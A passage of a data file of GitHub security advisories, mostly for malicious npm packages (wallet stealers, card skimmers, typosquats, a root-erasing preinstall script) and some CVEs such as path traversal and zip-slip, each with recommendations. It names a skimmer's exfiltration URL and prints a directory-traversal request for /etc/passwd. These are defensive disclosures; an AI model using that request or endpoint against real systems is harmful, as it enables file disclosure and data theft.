+This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate your ssh keys and your npm token.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'boogeyman'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/677'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v95x-h953-x7fg,2021-09-30T20:19:28Z,2020-09-03T19:47:55Z,,[],Malicious Package in k0a_multer,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'k0a_multer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1130'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v6vv-hhqc-6hh2,2023-07-25T20:30:52Z,2020-09-03T19:15:37Z,,[],Malicious Package in pyramid-proportion,"Version 1.0.5 of `pyramid-proportion` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider a downgrade to version 1.0.4.",[],"[{'package': {'ecosystem': 'npm', 'name': 'pyramid-proportion'}, 'versions': ['1.0.5']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1106'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wwwg-6r7f-9c9h,2021-09-30T20:15:33Z,2020-09-03T19:43:28Z,,[],Malicious Package in file-logging,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'file-logging'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1126'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9298-m7jf-55h2,2021-10-01T20:43:38Z,2020-09-04T16:42:08Z,,[],Malicious Package in bitconid-rpc,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitconid-rpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1369'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2h3x-95c6-885r,2021-09-30T20:01:18Z,2020-09-03T17:46:46Z,,[],Malicious Package in river-mock,"All versions of `river-mock` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'river-mock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1062'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cxm3-284p-qc4v,2021-07-29T15:56:20Z,2020-09-03T15:53:12Z,,['CVE-2020-7618'],Prototype Pollution in sds,"Affected versions of `sds` are vulnerable to prototype pollution. The `set` function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+## Recommendation
+
+Upgrade to version 4.0.0 or later","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sds'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7618'}, {'type': 'WEB', 'url': 'https://github.com/monsterkodi/sds/blob/master/js/set.js#L31'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SDS-564123'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1506'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:47Z', 'nvd_published_at': '2020-04-07T14:15:00Z'}"
+1.4.0,GHSA-8hq2-fcqm-39hq,2021-09-30T21:57:22Z,2020-09-02T21:46:05Z,,[],Malicious Package in rimrafall,"Version 1.0.0 of `rimrafall` contains malicious code as a preinstall script. The package attempts to remove all files in the system's root folder.
+
+
+## Recommendation
+
+If you installed this package it is likely your machine was erased. If not, remove the package from your system and verify if any files were deleted.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rimrafall'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/913'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-72q2-5rxx-xfff,2023-09-11T20:30:17Z,2020-09-01T16:12:12Z,,['CVE-2017-16040'],gfe-sass downloads Resources over HTTP,"Affected versions of `gfe-sass` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `gfe-sass`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gfe-sass'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16040'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/291'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:18:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3fv6-q5xv-fhpw,2023-07-27T00:01:55Z,2020-09-01T19:50:23Z,,[],Malicious Package in coffee-project,"Version 1.7.5 of `coffee-project` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.7.5 of this module is found installed you will want to replace it with a version before or after 1.7.5. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.7.4",[],"[{'package': {'ecosystem': 'npm', 'name': 'coffee-project'}, 'versions': ['1.7.5']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/621'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:12Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j9q7-3rhf-4ppv,2023-09-12T21:10:13Z,2020-09-01T16:11:08Z,,['CVE-2016-10687'],windows-selenium-chromedriver downloads Resources over HTTP,"Affected versions of `windows-selenium-chromedriver` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-selenium-chromedriver`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'windows-selenium-chromedriver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10687'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/285'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:17:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-536f-268f-6gxc,2021-09-29T21:25:46Z,2020-09-03T22:17:36Z,,[],Malicious Package in buffermxor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffermxor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1256'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p7qp-3fh7-pv4p,2021-09-29T21:27:36Z,2020-09-03T22:24:04Z,,[],Malicious Package in buffur-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffur-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1262'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m5p4-7wf9-6w99,2021-10-01T13:29:07Z,2020-09-01T21:10:53Z,,[],Malicious Package in regenrator,"All versions of `regenrator` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'regenrator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/685'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4vvp-x9h2-x2vf,2020-08-31T18:48:53Z,2020-09-03T20:26:39Z,,[],Path Traversal in public,"All versions of `public` are vulnerable to Path Traversal. This vulnerability allows an attacker to access files outside the webroot since it allows symlink navigation in the URL.
+
+
+## Recommendation
+
+No fix is currently available. Do not use `public` in production or consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'public'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/593911'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1144'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xr3g-4gg5-w3wq,2021-10-01T21:00:58Z,2020-09-03T17:06:14Z,,[],Malicious Package in degbu,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'degbu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1393'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-428f-mh7w-6w2x,2023-09-07T20:44:28Z,2020-09-01T18:56:40Z,,['CVE-2017-16127'],pandora-doomsday is malware,"The `pandora-doomsday` package is a malicious package that adds itself to the package.json of other packages discovered on the victim host and attempts to publish the package.
+
+It has been removed from the npm registry.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'pandora-doomsday'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16127'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/482'}]","{'cwe_ids': ['CWE-509'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:24:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q8qj-fc9q-cphr,2021-08-26T15:10:50Z,2020-09-25T18:28:25Z,,['CVE-2020-15191'],Undefined behavior in Tensorflow,"### Impact
+If a user passes an invalid argument to `dlpack.to_dlpack` the expected validations will cause variables to bind to `nullptr` while setting a `status` variable to the error condition.
+
+However, this `status` argument is not properly checked:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L265-L267
+
+Hence, code following these methods will bind references to null pointers:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L279-L285
+
+This is undefined behavior and reported as an error if compiling with `-fsanitize=null`.
+
+### Patches
+We have patched the issue in 22e07fb204386768e5bcbea563641ea11f96ceb8 and will release a patch release for all affected versions.
+
+We recommend users to upgrade to TensorFlow 2.2.1 or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been discovered during variant analysis of [GHSA-rjjg-hgv6-h69v](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rjjg-hgv6-h69v).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-q8qj-fc9q-cphr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15191'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/22e07fb204386768e5bcbea563641ea11f96ceb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-20', 'CWE-252', 'CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:03:28Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-x6ch-c6rv-f7wh,2021-10-01T13:46:49Z,2020-09-02T18:34:22Z,,[],Malicious Package in asymc,"All versions of `asymc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asymc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/841'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w65v-hx54-xrqx,2021-09-30T19:50:35Z,2020-09-03T17:41:23Z,,[],Malicious Package in midway-xtpl,"All versions of `midway-xtpl` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'midway-xtpl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1057'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3qh4-r86r-grvm,2020-08-31T18:36:57Z,2020-09-02T18:24:39Z,,['CVE-2017-1001004'],Arbitrary JavaScript Execution in typed-function,"Versions of `typed-function` prior to 0.10.6 are vulnerable to Arbitrary JavaScript Execution. Function names are not properly sanitized and may allow an attacker to execute arbitrary code.
+
+
+## Recommendation
+
+Upgrade to version 0.10.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'typed-function'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1001004'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/typed-function/commit/6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/typed-function/commit/6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe?diff=split#diff-9e1f22c2954a38db1fdf444dbc74e0a8'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/typed-function/blob/master/HISTORY.md#2017-11-18-version-0106'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TYPEDFUNCTION-174139'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/819'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:36:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h372-w3xp-2jg3,2023-09-07T21:55:06Z,2020-09-01T18:54:34Z,,['CVE-2017-16172'],Directory Traversal in section2.madisonjbrooks12,"Affected versions of `section2.madisonjbrooks12` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'section2.madisonjbrooks12'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16172'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/section2.madisonjbrooks12'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/468'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:24:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-73v8-v6g4-vrpm,2020-08-31T18:35:21Z,2020-09-02T15:58:13Z,,[],Arbitrary File Overwrite in decompress-zip,"Vulnerable versions of `decompress-zip` are affected by the Zip-Slip vulnerability, an arbitrary file write vulnerability. The vulnerability occurs because `decompress-zip` does not verify that extracted files do not resolve to targets outside of the extraction root directory.
+
+
+
+## Recommendation
+
+For `decompress-zip` 0.2.x upgrade to 0.2.2 or later.
+For `decompress-zip` 0.3.x upgrade to 0.3.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'decompress-zip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'decompress-zip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/488.json'}, {'type': 'WEB', 'url': 'https://snyk.io/research/zip-slip-vulnerability'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/777'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:35:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xrrg-wfwc-c7r3,2021-10-01T20:37:47Z,2020-09-04T15:33:52Z,,[],Malicious Package in bictoin-ops,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bictoin-ops'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1354'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3h9m-9g3g-5wqx,2021-09-29T21:13:02Z,2020-09-03T22:13:14Z,,[],Malicious Package in buffer-xov,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xov'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1252'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8g64-9cm2-838j,2021-09-29T21:36:41Z,2020-09-03T22:29:26Z,,[],Malicious Package in bugfer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bugfer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1266'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2563-83p7-f34p,2021-10-01T14:04:11Z,2020-09-02T20:24:41Z,,[],Malicious Package in requestt,"All versions of `requestt` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
